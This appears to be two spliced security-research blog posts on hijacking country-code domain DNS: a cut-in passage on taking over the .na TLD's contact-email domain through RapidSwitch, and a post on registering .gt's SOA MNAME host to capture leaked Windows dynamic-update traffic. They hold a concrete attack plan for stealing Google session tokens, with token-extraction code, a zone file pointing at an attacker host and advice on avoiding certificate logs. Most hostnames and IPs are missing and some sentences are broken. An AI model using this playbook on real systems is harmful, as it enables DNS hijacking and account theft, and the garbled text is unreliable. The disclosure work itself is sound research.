The IANA staff will verify authorization/authenticity of the request and obtain confirmation from the listed TLD administrative and technical contacts that those contacts are aware of and in agreement with the requested changes. A minimum authentication of an exchange of e-mails with the e-mail addresses registered with the IANA is required.

The key point is that IANA will allow a nameserver change to be made for a TLD (just complete this form) if both the admin and technical contacts on the WHOIS record confirm via email that they want the change to occur.
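Since those WHOIS contact email addresses are effectively the keys to the TLD, checking their security boils down to scraping the contact emails out of each IANA WHOIS record and collecting their domains. A minimal sketch (the WHOIS text here is fabricated sample data, not a real record):

```python
import re

def contact_email_domains(whois_text: str) -> set:
    """Collect the domains of every e-mail address in a WHOIS blob."""
    emails = re.findall(r"[\w.+-]+@([\w.-]+)", whois_text)
    return {domain.lower() for domain in emails}

# Fabricated sample WHOIS output:
sample_whois = """
contact:  administrative
e-mail:   hostmaster@example.com.na
contact:  technical
e-mail:   noc@EXAMPLE.NET
"""
```

Each resulting domain can then be fed to a tool like TrustTrees to map out its delegation paths.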

In the interest of testing the security of this practice, I enumerated all of the TLD WHOIS contact email address domains and used the TrustTrees script I wrote to look for errors in the DNS configurations of those domains. After reading through pages of diagrams I found something interesting in the DNS for the .na TLD's contact email domain ( The following is the relevant section of the delegation-path diagram for that domain:

[Diagram: delegation paths for, zoomed to the failing nameservers]

As can be seen above, three nameservers for the domain all return fatal errors when queried. These three nameservers all belong to the managed DNS provider RapidSwitch. If we do a query in dig we can see the specific details of the error being returned:

$ dig NS

; <<>> DiG 9.8.3-P1 <<>> NS
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: REFUSED, id: 56285
;; flags: qr rd; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 0
;; WARNING: recursion requested but not available

;            IN    NS

;; Query time: 138 msec
;; SERVER: 2001:1b40:f000:41::4#53(2001:1b40:f000:41::4)
;; WHEN: Fri Jun  2 01:13:03 2017
;; MSG SIZE  rcvd: 31

The nameserver replies with a DNS REFUSED error code. Just as with the Angola domain extensions this error code can indicate that the domain is vulnerable to takeover if the managed DNS provider does not properly validate domains before users add them to their account. To investigate I created a RapidSwitch account and navigated to the “My Domains” portion of the website:

[Screenshot: the "Add Hosted Domain" button]

The "My Domains" section contained an "Add Hosted Domain" button, which was exactly what I was looking for.

[Screenshot: RapidSwitch "domain added" banner]

By completing this process I was able to add the domain to my account without any ownership verification. The only check that appeared to occur was a verification that RapidSwitch was indeed listed as a nameserver for the specified domain.

Having the domain in my account was problematic because I then had to replicate the DNS setup of the original nameservers in order to prevent interruptions to the domain's DNS (which hosts email, websites, and other services). Deleting the domain from my account would've made it vulnerable to takeover again, so I had to clone the existing records as well.

Once the records were created I added a test record in order to verify that I had indeed successfully hijacked the DNS for the domain. The following dig query shows the results:

$ dig ANY

; <<>> DiG 9.8.3-P1 <<>> ANY
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 49573
;; flags: qr aa rd; QUERY: 1, ANSWER: 2, AUTHORITY: 4, ADDITIONAL: 4
;; WARNING: recursion requested but not available

;        IN    ANY

;; ANSWER SECTION:    300    IN    A    300    IN    TXT    "mandatory was here"

;; AUTHORITY SECTION:        300    IN    NS        300    IN    NS        300    IN    NS        300    IN    NS

;; ADDITIONAL SECTION:    1200    IN    A    1200    IN    A    3600    IN    A    1200    IN    A

;; Query time: 722 msec
;; SERVER: 2001:1b40:f000:42::4#53(2001:1b40:f000:42::4)
;; WHEN: Sat Jun  3 17:33:59 2017
;; MSG SIZE  rcvd: 252

As can be seen above, the TXT record (and A record) is successfully returned, confirming the DNS hijack. In a real-world attack the final step would be to DDoS the remaining legitimate nameserver to eliminate competition for DNS responses (a step we obviously won't be taking)*.

After this I reached out to the .na TLD contacts to report the vulnerability and get it fixed as soon as possible. For more information on this disclosure timeline see the “Responsible Disclosure Timeline” section below.

*There is one more complication with our attack plan: unlike the Angolan extensions, the domain has DNSSEC enabled. This is actually something I didn't even notice at first because my resolver doesn't validate DNSSEC. After trying a few different networks it appears that almost none of the resolvers I used actually enforce DNSSEC properly (which surprised me quite a bit). After doing some more research it appears that global adoption of DNSSEC validation by resolvers is quite low, which explains this behavior. So, depending on resolver configurations, our attack may be complicated by this issue! We'll discuss this further in the final conclusions section below. That being said, nice job to the admin who set it up!

The Impact of a TLD/Domain Extension Takeover

Universal Authentication & International Domains

Despite these vulnerabilities affecting extensions for the countries of Angola and Namibia, the effects reach much farther than just those countries. For example, many popular online services have multiple homepages with domain extensions of the local country/area to give the site a more local feel. Many of these sites tie all of their homepages together with a universal authentication flow that automatically logs the user into any of the homepages despite them all being separate domains.

One example of this is Google, which has search homepages under many extensions (here is a link which appears to have aggregated them all). One of these, of course, is

[Screenshot: homepage]

Another is

[Screenshot: homepage]

In order to provide a more seamless experience you can easily log yourself into any Google homepage (if you were already authenticated to Google on another homepage) by just clicking the blue button in the top right corner of the homepage. This button is just a link similar to the following:

Visiting this link will result in a 302 redirect to the following URL:[SESSION_TOKEN]&continue=

This passes a session token in the sidt parameter which logs you into the domain, allowing the authentication to cross the domain/origin barrier.
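In other words, whoever controls DNS for the redirect's destination can read the token straight out of the request. A toy sketch of the attacker's side (hostnames and the token value are fabricated; only the sidt parameter name comes from the observed redirect):

```python
from urllib.parse import urlsplit, parse_qs

def token_from_redirect(location: str):
    """Extract the session token from a captured redirect URL, if present."""
    query = parse_qs(urlsplit(location).query)
    return query.get("sidt", [None])[0]

# Fabricated example of a captured Location header:
captured = "https://hijacked.example/TokenAuth?sidt=FAKE_TOKEN&continue=https://www.example/"
```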

What this means for exploitation, however, is that if you compromise any Google homepage domain extension (of which Google trusts roughly 200) then you can utilize this flow to begin hijacking Google accounts from any region. This is a bizarre threat model because it's quite likely that you could exploit one of the ~200 domain extension nameservers/registries before you could get a working exploit against Google's standard set of services. After all, Google has a large security team full of people constantly auditing their infrastructure, whereas many TLDs and domain extensions are run by random and often small organizations.

This is simplifying it quite a bit of course. In order to actually abuse a DNS hijacking vulnerability of this type you would have to complete the following steps (all in a stealthy manner as to not get caught too quickly):

  • Compromise a domain extension’s nameserver or registry to gain the ability to modify nameservers for your target’s website.
  • Begin returning new nameservers which you control for your target domain with an extremely long TTL (BIND's resolver supports up to a week by default). This is important so that we get cached in as many resolvers as possible; we also want to set a low TTL on the actual A records for the sub-domains so that we can switch these over quickly when we want to strike.
  • Once we’ve heavily stacked the deck in our favor we must now get a valid SSL certificate for our domain name. This is one of the trickiest steps because certificate transparency can get us caught very quickly. The discussion around certificate transparency, and getting a certificate without being logged in certificate transparency logs is a long one but suffice to say that it’s not going to be as easy as it was.
  • We now set up multiple servers to host the malicious site with SSL enabled and switch all of the A record responses to point to our malicious servers. We then begin our campaign to get as many Google users as possible to visit the above link and give us their authentication tokens; depending on the goal this may be a more targeted campaign, etc. One nice part about this attack is that the victims don't even have to visit the URL – any resource-tag request (anything that causes a GET request) will complete the 302 redirect and yield what we're looking for.
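The TTL stacking in the second step above would look something like this in the malicious zone data (all names and addresses are placeholders):

```conf
; Long TTL on the poisoned delegation, short TTL on the A records we
; plan to flip when the attack goes live. Placeholder names/IPs.
victim.example.      604800  IN  NS  ns1.attacker.example.   ; cached ~1 week
victim.example.      604800  IN  NS  ns2.attacker.example.
www.victim.example.      60  IN  A           ; easy to swap later
```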

Widespread Effects – A Tangled Web

One other thing to consider is that not only are all domains under *.na, *, and the other affected Angolan extensions vulnerable to DNS hijacking, but anything that depends on these extensions may be vulnerable as well. For example, other domains whose nameserver hostnames live under these extensions can be poisoned by proxy (though glue records may make this tricky). WHOIS contacts whose email addresses use domains under these extensions are also in danger, since control of a WHOIS contact email can be used to pull domains away from their owners and to issue SSL certificates. Moving up the layers of the stack, things like HTTP resource includes on websites reveal just how entangled the web actually is.

Conclusions & Final Thoughts

I hope that I've made a convincing argument that the security of domain extensions/TLDs is not infallible. Keep in mind that even with all of these DNS tricks, the easiest method is likely just to exploit a vulnerability in a service running on a domain extension's nameservers. In my opinion, the following steps should be taken by Internet authorities and the wider community to better secure the DNS:

  • Require phone confirmation for high impact changes to TLDs in addition to the minimum requirement of email confirmation from the WHOIS contacts.
  • Set stricter requirements for TLD nameservers – limiting port exposure to just UDP/TCP port 53.
  • Perform continual automated auditing of TLD DNS and notify TLD operators upon detection of DNS errors.
  • Inform domain owners about the risks of buying into various domain extensions/TLDs and keep a record of past security incidents so that people can make an informed decision when purchasing their domains. Metrics like response time and time-to-resolution for alleged security incidents are important to track as well.
  • Raise greater awareness of DNSSEC and push DNS resolvers to support it. The adoption for DNSSEC is incredibly poor and if implemented by both the domain and the resolver being used it can thwart some of these hijacking issues (assuming the attacker hasn’t compromised the keys as well). Speaking from personal experience, I don’t even notice DNSSEC failures because virtually no network (mobile, home, etc) that I use actually enforces it. I won’t get into the longer arguments around DNSSEC as a whole but suffice to say it would definitely be an additional layer of protection against these attacks.

Given the political complications when it comes to ccTLDs some of the enforcement of policies is undoubtedly tricky. While I believe that the above list would improve security I also understand that actually ensuring these things happen is also tough especially with so many parties involved (it’s always easier said than done). That being said, it’s important to weigh the safety of the DNS against the appeasement of the parties involved. Given the incredibly large attack surface I’m surprised that compromise of TLDs/domain extensions isn’t a more frequent event.

Responsible Disclosure Timeline

Angola * & * Takeover Disclosure

  • February 14, 2017: Reached out via contact form requesting a security contact and PGP key to report the vulnerability.
  • February 15, 2017: Reply received with PGP ID specified and PGP encryption requested.
  • February 15, 2017: Sent full details of the vulnerability in a PGP-encrypted email.
  • February 21, 2017: Emailed the Google security team about the account takeover issue, advising they turn off the universal homepage authentication flow for the affected extensions to prevent Google accounts from being hijacked.
  • February 22, 2017: Emailed the BackupDNS owner requesting help to block these zones from being added to arbitrary BackupDNS accounts.
  • February 22, 2017: BackupDNS owner replied stating he would put a block in place requiring admin approval to add zones to user accounts.
  • February 22, 2017: Confirmed with the BackupDNS owner that I was no longer able to add the zones to my account.
  • February 24, 2017: Received a reply stating the problem had been fixed by removing BackupDNS's nameservers from the list of authoritative nameservers.

Namibia TLD *.na Takeover Disclosure

  • June 3, 2017: Emailed the contacts on the .na WHOIS record inquiring about the proper place to disclose a security vulnerability in the .na TLD's WHOIS contact email domain.
  • June 3, 2017: Received confirmation that the admin contact was the appropriate source to disclose this issue.
  • June 3, 2017: Disclosed the issue to the admin contact.
  • June 3, 2017: Vulnerability remediated by changing the nameservers for the domain and removing the RapidSwitch nameservers altogether.

Disclosure Note: This was an incredible turnaround, with the issue being received and fixed in just a few hours. In situations such as these I expect the turnaround to be weeks to months, but due to the responsiveness of the operator this was remediated almost immediately. Preventing all security issues isn't possible, but reacting to existing ones with haste says a lot – hats off to the DNS admin of the .na TLD!

[Image: Guatemala City, by Rigostar (own work), CC BY-SA 3.0, via Wikimedia Commons]

UPDATE: Guatemala has now patched this issue after I reached out to their DNS administrator (and with a super quick turnaround as well!)

In search of new, interesting, high-impact DNS vulnerabilities I decided to take a look at the various top-level domains (TLDs) and analyze their configurations for errors. Upon some initial searching it turns out there is a nice open source tool which helps DNS administrators scan their domains for misconfigurations called DNSCheck, written by The Internet Foundation in Sweden. This tool highlights all sorts of odd DNS misconfigurations, such as a mismatch between a domain's authoritative nameserver list and the NS records set at the parent TLD's nameservers (this was the issue behind the domain takeover vulnerabilities covered in a previous post). While it doesn't explicitly point out vulnerabilities in these domains, it does let us know when something is misconfigured, which is as good a place as any to start.

As of the time of this writing there are ~1,519 top-level domains. Instead of scanning each TLD by hand I opted to write a script to automate scanning all of them. The results of this script can be found in my Github repo titled TLD Health Report. The script was designed to highlight which TLDs have the most serious misconfigurations. After spending an hour or two reviewing the TLDs with configuration errors I came across an interesting issue with the .gt TLD. The error can be seen on this Github page and is as follows:

Soa Scan

  • No address found for the SOA MNAME host. No IPv4 or IPv6 address was found for the host name.
  • Error while checking SOA MNAME for gt. The SOA MNAME is not a valid host name.
  • SOA MNAME for gt. not listed as NS. The name server listed as the SOA MNAME is not listed as a name server.

…trimmed for brevity…

As can be seen from the above, multiple errors and warnings state that the hostname listed as the primary master nameserver (MNAME) for the .gt TLD is not resolvable and is not a valid nameserver for the zone. We can see this configuration in action with the following dig command:

~/P/gtmaster> dig SOA

; <<>> DiG 9.8.3-P1 <<>> SOA
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 1444
;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0

;        IN    SOA

gt.            0    IN    SOA 2017012900 3600 600 604800 14400

;; Query time: 43 msec
;; WHEN: Sun Jan 29 16:11:57 2017
;; MSG SIZE  rcvd: 101

As can be seen above, we receive an NXDOMAIN error (because the domain we requested does not exist), and along with it we get a start of authority (SOA) record with the unresolvable hostname listed as the master nameserver (MNAME). Any request for a non-existent domain under the .gt TLD will return an SOA record with this hostname in it.
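This matters because clients parse the MNAME out of exactly this kind of SOA answer. As a sketch (the record text mirrors the dig output above, but with a placeholder master name, since the real hostname is stripped in this copy):

```python
def soa_mname(soa_rdata: str) -> str:
    """The MNAME is the first field of an SOA record's presentation-format RDATA."""
    return soa_rdata.split()[0].rstrip(".")

# Placeholder MNAME/RNAME; serial and timers copied from the dig output above.
soa = "master.placeholder.gt. hostmaster.placeholder.gt. 2017012900 3600 600 604800 14400"
```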

“Unresolvable” is Just Another Word for “Not Resolvable Yet”

If you've read some of the previous posts on DNS vulnerabilities that I've written, you may have already guessed why this hostname isn't resolving. It's because the domain doesn't exist! As it turns out, it's also open for registration. With a bit of searching and Google Translate I found that it was available for registration from the "Registro de Dominios .gt" for around $60 a year (with a minimum registration of two years).


[Screenshot: the registration payment page – would you believe they take Visa?]


While pricey, the registration was quick and completely automated, which is more than I can say for many other TLDs in Central America. The only drawback was that my debit card was immediately frozen for questionable activity, and I had to go online to unfreeze it so the order could go through:

Apparently buying a Guatemalan domain name at 1:30 AM is grounds for your card being frozen.

Listening for Noise

Because the SOA MNAME is a somewhat esoteric feature of DNS, I wasn't sure what to expect in terms of DNS traffic. It was unclear from casual Googling which types of DNS clients and services would actually make use of this field at all. For this reason I configured my BIND DNS server to answer all A record queries for any domain under .gt with the IP address of my server as a general catch-all. I set up tcpdump to dump all DNS traffic into a pcap file for later analysis and let the box sit overnight.
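The catch-all itself is only a few lines of BIND configuration plus a wildcard zone. A sketch with placeholder hostnames, file paths, and server IP (the real setup may have differed):

```conf
// named.conf: claim authority for "gt" locally so the wildcard below matches
zone "gt" {
    type master;
    file "/etc/bind/db.gt-catchall";
};

; db.gt-catchall -- answer every A query under .gt with our own address
$TTL 60
@   IN  SOA ns.placeholder.gt. hostmaster.placeholder.gt. ( 1 3600 600 604800 60 )
@   IN  NS  ns.placeholder.gt.
*   IN  A                ; placeholder: this server's IP
ns  IN  A
```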

What I found in the morning was far from expected. When I checked the pcap data I found that computers from all over the country of Guatemala were sending DNS queries to my server:

[Screenshot: Wireshark capture of the incoming DNS traffic]

What in the world is going on? Looking further into the results only appeared to yield more confusion:

[Screenshot: an SRV dynamic update query]

A majority of the traffic was DNS UPDATE queries originating from internal network IP addresses. The above is an example DNS UPDATE request attempting to update the zone of my DNS server to include an SRV record for an internal LDAP server belonging to a random government network in Guatemala.

So, why all of the DNS queries? If you're familiar with what _ldap._tcp.dc._msdcs is for, then you may have already seen where this is going.

Understanding Windows Active Directory Domains

To understand why we are getting this traffic we have to take a quick diversion to learn about Windows Active Directory (AD) Domains and DDNS (Dynamic DNS).

Windows domains are structured in much the same way as Internet domain names. When creating a Windows domain you must specify a DNS suffix. This DNS suffix is comparable to a base domain, with all of the sub-domains being either child domains or simply hostnames of machines under the parent domain. As an example, say we have a Windows domain of and two Windows Active Directory (AD) networks under this parent domain: east and west. In this structure we would set up two domains under the parent domain as and If we had a dedicated web server for internal company documentation for the east office, it might have a hostname like In this way we build up a domain tree of our network, much as is done with the Internet's DNS. The following is our example network as a tree:

[Diagram: the example network as a domain tree]

Hostnames like allow computers and people to easily find each other on this network. The network's DNS server takes these human-readable hostnames and turns them into IP addresses of the specific machines so that your computer knows where to route traffic. So when, for example, you type the internal website URL into your web browser, your computer asks the network's DNS server for the IP address of this hostname in order to find it and route traffic to it.

Given this structure, a problem arises. Since machine IP addresses can often change on these networks, what happens when the server behind suddenly has a change in IP (say, due to a new DHCP lease)? How can the network's DNS servers learn the new IP address of this machine?

Understanding Windows Dynamic Update

Windows Active Directory networks solve this problem with something called Dynamic Update. Dynamic update at its core is actually very simple. In order to keep records such as fresh and accurate, these servers will occasionally reach out to the network's DNS server and update their specific DNS records. For example, if the documentation server's IP address suddenly changed, it would reach out to the domain's DNS server and say, "Hey! My IP changed, please update the record to point to my new IP so people know where I am!" A comparable real-world situation would be a person moving apartments and having to notify their friends, workplace, and online shopping outlets of the new address to reach them at via mail.

The process for this is a bit technical (I've summarized it below) and is as follows (quoted from "Understanding Dynamic Update"):

  • The DNS Client service sends a start of authority (SOA)–type query using the DNS domain name of the computer.
  • The client computer uses the currently configured FQDN of the computer (such as as the name that is specified in this query.
    • For standard primary zones, the primary server (owner) that is returned in the SOA query response is fixed and static. It always matches the exact DNS name as it appears in the SOA resource record that is stored with the zone. If, however, the zone being updated is directory integrated, any DNS server that is loading the zone can respond and dynamically insert its own name as the primary server (owner) of the zone in the SOA query response.
  • The DNS Client service then attempts to contact the primary DNS server.
    • The client processes the SOA query response for its name to determine the IP address of the DNS server that is authorized as the primary server for accepting its name. It then proceeds to perform the following sequence of steps as needed to contact and dynamically update its primary server
      • It sends a dynamic update request to the primary server that is determined in the SOA query response.

        If the update succeeds, no further action is taken.

      • If this update fails, the client next sends a name server (NS)–type query for the zone name that is specified in the SOA record.
      • When it receives a response to this query, it sends an SOA query to the first DNS server that is listed in the response.
      • After the SOA query is resolved, the client sends a dynamic update to the server that is specified in the returned SOA record.

        If the update succeeds, no further action is taken.

      • If this update fails, the client repeats the SOA query process by sending to the next DNS server that is listed in the response.
  • After the primary server that can perform the update is contacted, the client sends the update request and the server processes it.

    The contents of the update request include instructions to add host (A) (and possibly pointer (PTR)) resource records for and to remove these same record types for, the name that was registered previously.

    The server also checks to ensure that updates are permitted for the client request. For standard primary zones, dynamic updates are not secured; therefore, any client attempt to update succeeds. For AD DS-integrated zones, updates are secured and performed using directory-based security settings.

The above process is long-winded and can be a lot to digest at first. Summing it up, the client does the following:

  • The host sends an SOA query containing its full hostname (in our previous example, to the network's DNS server.
  • The network's DNS server receives this request and replies with an SOA record which specifies the hostname of the master nameserver – something like, for example.
  • The client parses this SOA record and reaches out to the master nameserver specified in the SOA MNAME field with the DNS update/change it would like to make.
  • The DNS server receives this update and changes its records to match. The DNS record for now points to the host's new IP address and everything routes properly again!
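The flow above can be modeled in a few lines. Here the "network" is just a dict mapping zones to their SOA MNAMEs, using the hypothetical example-network names from this section:

```python
# Toy model of the dynamic-update flow: find the enclosing zone's SOA,
# read its MNAME, and that's where the update gets sent.
SOA_MNAME = {
    "": "",
}

def find_update_target(fqdn: str):
    """Walk up the name until a zone with an SOA is found; return its MNAME."""
    labels = fqdn.split(".")
    for i in range(len(labels)):
        zone = ".".join(labels[i:])
        if zone in SOA_MNAME:
            return SOA_MNAME[zone]
    return None
```

The key observation for what follows: the client trusts whatever MNAME comes back, and sends its update there.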

Windows Domain Naming Conventions & Best Practice Guidelines

The final piece of information we need to absorb before we understand our Guatemalan DNS anomaly is the following requirement for Windows domains:

“By default, the DNS client does not attempt dynamic update of top-level domain (TLD) zones. Any zone that is named with a single-label name is considered to be a TLD zone, for example, com, edu, blank, my-company. To configure a DNS client to allow the dynamic update of TLD zones, you can use the Update Top Level Domain Zones policy setting or you can modify the registry.”

So by default you can't have a Windows domain of companydomain, for example, because it's single-label and is considered by Windows to be a top-level domain (TLD) like .com, .net, or .gt. While this setting can be overridden on each individual DNS client (read: every computer in your network), it's much easier just to use a multi-label domain like While not all companies follow this direction, it is highly recommended, because having a single-label domain could cause many conflicts down the line if your internal network's domain ends up being registered as a top-level domain in the Internet's DNS root zone (an issue known as Name Collision, which was, and continues to be, a hotly discussed topic).

Putting it All Together – Becoming Master of Your Domain!

Now that we have all of this information, the situation becomes quite a bit clearer. The country of Guatemala likely has many Windows networks whose internal Windows domains are sub-domains of the .gt TLD. For example, if Microsoft had an office in Guatemala, their internal network domain might be a name under .gt. These machines periodically make dynamic DNS updates to their network's DNS server to ensure that all of the network's hostnames are up-to-date and routing properly. For a variety of reasons, such as preventing name collisions with a company's external Internet sub-domains, it's also likely that many networks use internal network domains which don't exist on the wider Internet, since hosts under such a domain would never have naming conflicts with external Internet sub-domains.

The issue is, many subtle DNS misconfigurations can cause DNS requests which should go to the internal domain’s DNS server to hit the top level domain’s (TLD) servers instead. This is a well-documented issue known as name collision, sometimes referred to as DNS queries “leaking”. If a machine uses a DNS resolver which is not aware of the internal network’s DNS setup, or is misconfigured to pass these queries on to the outer Internet’s DNS servers, then these queries are leaked to the .gt TLD servers, since they are the delegated nameservers for that entire TLD space. The problem of name collisions is incredibly common, and it is the same reason why new TLDs are subjected to a large amount of scrutiny to make sure that they aren’t a common internal network domain name such as .local, .localhost, .localdomain, etc.
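The leaking mechanism can be sketched in a few lines. The following is a toy illustration (not Windows’ actual resolution algorithm), using the made-up internal suffix corp.gt, of how a bare hostname becomes a fully-qualified .gt query that a misconfigured resolver will happily forward toward the public TLD servers:

```python
# Toy illustration: a DNS search suffix turns a bare hostname into a
# fully-qualified query name. If the resolver handling it doesn't know
# about the internal zone, this FQDN "leaks" to the public .gt servers.
# "corp.gt" is an invented example suffix, not a real network's domain.

def qualify(hostname: str, search_suffixes: list[str]) -> list[str]:
    """Return the candidate FQDNs a stub resolver would try, in order."""
    if hostname.endswith("."):          # already fully qualified
        return [hostname]
    return [f"{hostname}.{suffix}." for suffix in search_suffixes]

print(qualify("fileserver01", ["corp.gt"]))   # ['fileserver01.corp.gt.']
```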

When this leaking occurs for an internal domain under the .gt extension, the DNS UPDATE query sent by a machine attempting to update an internal DNS record is accidentally sent to the .gt TLD servers. Say, for example, we are a host on an internal .gt domain and we send our DNS UPDATE query to a TLD server. The following is an example of this query performed with the nsupdate DNS command line tool (available on most OS X and Linux systems):

[email protected] ~/P/gtmaster> nsupdate -d
> prereq nxdomain
> update add 800 A
> send
Reply from SOA query:
;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id:  25175
;; flags: qr rd ra; QUESTION: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 0
; IN    SOA

;; AUTHORITY SECTION:
            0    IN    SOA 2017012812 3600 600 604800 14400

Found zone name:
The master is:
Sending update to
Outgoing update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOERROR, id:  62645
;; flags:; ZONE: 1, PREREQ: 1, UPDATE: 1, ADDITIONAL: 0


Reply from update query:
;; ->>HEADER<<- opcode: UPDATE, status: NOTAUTH, id:  62645
;; flags: qr; ZONE: 1, PREREQ: 0, UPDATE: 0, ADDITIONAL: 0
;                IN    SOA


We can see that the query resulted in an NXDOMAIN error, but an SOA response is returned regardless, listing a master nameserver in its MNAME field. Since this is exactly what the host was looking for (i.e. it’s a valid SOA response to this query), it parses out the MNAME and proceeds to send the DNS update query to the server behind that name, which is hosted on my server. This query ends in failure because I’ve set up my DNS server to reject all update requests from clients (since I don’t want to actively interfere with these machines/networks). This is why all of these random machines are sending DNS update requests to my server.
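What the updating host does with that SOA answer can be sketched in a couple of lines. Below is a minimal illustration in plain Python (no DNS library; the SOA field values are invented placeholders): take the MNAME, the first field of the SOA RDATA, and treat it as the server to send the DNS UPDATE to.

```python
# A minimal sketch of what an update client effectively does with the
# SOA answer it receives: extract the MNAME (the "primary master") and
# target it with the DNS UPDATE. All field values here are invented.

def soa_mname(soa_rdata: str) -> str:
    """SOA RDATA layout: MNAME RNAME SERIAL REFRESH RETRY EXPIRE MINIMUM."""
    fields = soa_rdata.split()
    return fields[0]

rdata = "ns-master.example.net. hostmaster.example.net. 2017012812 3600 600 604800 14400"
print(soa_mname(rdata))   # ns-master.example.net.
```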

What we have is essentially a new DNS issue: name collisions leading to dynamic DNS updates being sent to whatever server is listed under a TLD’s SOA record. Unlike regular name collisions, though, we don’t need to register an entirely new TLD to exploit this issue; we just need to register the domain name listed in an existing TLD’s SOA MNAME (as we did with .gt).

Try It Yourself – A Quick Lab

Note: Feel free to skip this section if you’re not interested in replicating these results personally.

If you’d like to see this behavior in action it’s actually fairly simple to replicate. We’ll use Windows 7 as our example OS inside of VMware along with Wireshark running to follow all the DNS traffic being sent by our machine.

To change your computer’s DNS suffix to match what a Guatemalan active directory domain might look like, go to Start > Computer > System Properties > Change Settings > Change > More and set the primary DNS suffix to any domain under the .gt TLD:

Click OK and apply this new setting; you will be prompted to restart your computer. Go ahead and do so, and keep Wireshark running while Windows is starting up. You should see that during the startup process a few Dynamic Update queries are issued:

The above screenshot of my Wireshark output shows that the Windows VM did the following upon startup:

  • Windows attempts to query the DNS resolver for the SOA of its configured domain (resulting in an NXDOMAIN error because that record doesn’t exist in the public Internet DNS which the resolver is configured to query).
  • Windows then parses this NXDOMAIN response and finds a valid SOA MNAME in the response sent from the TLD.
  • Windows then reaches out to that MNAME host (my server) and attempts a DNS UPDATE request. This fails because my server is configured to refuse all of these requests.
  • Windows then attempts the entire process over again, this time in all capital letters instead (???).

We’ve now seen in action exactly what goes on with these Windows machines that are hitting my server.

So, Just How Common Is This Issue?

Since Guatemala, and by proxy the .gt domain space, is relatively small in comparison to bigger top level domains such as .com, .net, .org, and .us, we can only see a small fraction of the global number of DNS requests made due to this issue. On a larger scale, it’s likely that a huge amount of traffic is generated to many of the more-popular TLD nameservers from networks which utilize those TLDs in their AD domains.

Luckily, while I haven’t been able to find any previous exploit research on Dynamic Update SOA hijacking specifically, we do have a great deal of past research on name collisions in general. This is largely because of worries about newly issued TLDs conflicting with internal network domains which are utilized by computers/networks across the world. For a good overview of this problem and research into how widespread it is, I recommend reading Name Collision in the DNS, a report commissioned by ICANN to better understand the name collision problem and its effects on the wider Internet. This report contains lots of real-world data on just how big the name collision problem is and gives us a good base to extrapolate how widespread this specific SOA Dynamic Update variant is in the wild.

Perhaps the most damning piece of real world data that was collected and presented in this report is the following table:

The above table is a ranked list of requested TLDs ordered by number of DNS requests to the roots (in thousands). The original report lists the top 100 TLDs, but the above image truncates it to just 20. This table sheds some light on the raw number of leaked DNS requests actually hitting the roots that were never meant to end up there at all. As can be seen, requests for the invalid TLD of .local account for more requests to the DNS roots than all .org and .arpa requests combined – ranking as the 3rd most requested TLD overall! The following pie chart sheds further light onto the scale of the problem:

The above chart shows that a shocking 45% of requests to the root servers are for TLDs which do not exist and are likely the result of leaked DNS requests. Perhaps even more shocking is that the number is likely even higher, due to the possibility of internal domains having a valid top level domain but an invalid second level domain, such as the internal .gt domains mentioned previously. These requests would appear valid to the roots (since .gt is a valid record in the root zone) but would be revealed as leaked/invalid once they hit the TLD servers.

What’s also very interesting is that the report mentions observing traffic stemming from this problem, but does not appear to have investigated it much:

5.4.5 Name includes _ldap or _kerberos at the lowest level

Patterns observed show many requests of one of the forms:

  • _ldap._tcp.dc._msdcs.
  • _ldap._tcp.pdc._msdcs.
  • _ldap._tcp.._sites.dc._msdcs.
  • _ldap._tcp.._sites.gc._msdcs.
  • _ldap._tcp.._sites.
  • _ldap._tcp.
  • _kerberos._tcp.dc._msdcs.
  • _kerberos._tcp.._sites.dc._msdcs.
  • _kerberos._tcp.._sites.
  • _kerberos._tcp.

Typically these are queries for SRV records, although sometimes they are requests for SOA records. They appear to be related to Microsoft Active Directory services.

Look familiar? The above remark about SOA records almost certainly describes traffic generated by this exact same issue. It is mentioned again later in the report as well:

Although the overwhelming majority of the observed DNS traffic in this study has been name lookups (i.e., conventional queries), some other DNS requests have been detected. These are mostly Dynamic Updates—traffic that should never reach the root servers. After all, changes to the DNS root are not carried out using Dynamic Updates, let alone ones originating from random IP addresses on the Internet. The most likely explanation for this behavior would be misconfigured Active Directory installations that leak from an internal network to the public Internet. It should be noted however that this study did not examine the root cause of this traffic.

The statement eventually concludes with:

It is not known what impact, if any, this might have on the end client or how this could change its subsequent behavior. Currently, no significant harm appears to result when these Dynamic Update requests receive a REFUSED or NOTAUTH error response. Returning a referral response after example is delegated at the root might cause these clients to fail or behave unexpectedly. It seems likely that this would create end user confusion and support problems for the organization’s IT department.

Sadly this report doesn’t make any statements about the actual volume of this traffic, so we’re unable to get a good idea of the percentage/total scale of this issue in comparison to other name collisions. The report also fails to realize that the security considerations are actually much larger in scope, due to the fact that the SOA MNAME returned by TLDs can be a completely arbitrary domain (as was the case with .gt). This allows potentially any attacker to get in the middle of these DNS transactions via a simple domain registration, just as we exploited for .gt.

Given this admittedly limited information, I don’t think it’s a big reach to assume that this issue is actively occurring at scale and that many of the top level domain servers see a non-trivial amount of traffic from this problem. Depending on the specific configuration of each TLD’s SOA record, they may also be vulnerable to exploitation if their SOA MNAME is available for registration, as was the case here.

Fixing the Problem & Wider TLD Security Considerations

Given that the barrier to entry for exploiting this problem is so low (essentially just buying a domain name), and the impact is concerning for a number of reasons, I don’t feel it would be unreasonable to require TLDs to ensure that the SOA MNAME field of their responses is either non-resolvable or resolves to a TLD-controlled server which refuses to process dynamic update queries. Given that this mistake appears to be easy to make, largely because the SOA MNAME field is not really used for master-slave replication much anymore, this change shouldn’t be too burdensome. Sadly, if you review the results of the generated TLD Health Report mentioned earlier in this post, you’ll see that a shocking number of TLDs are actually very broken in the functional sense. Given this fact, the hope for enforcement of this security concern is low, since even simple things like “having all the TLD nameservers in a working state” are not currently universally true. If we can’t even ensure that TLDs are healthy in general, how can we ever hope to ensure that all TLDs are mitigating this issue?

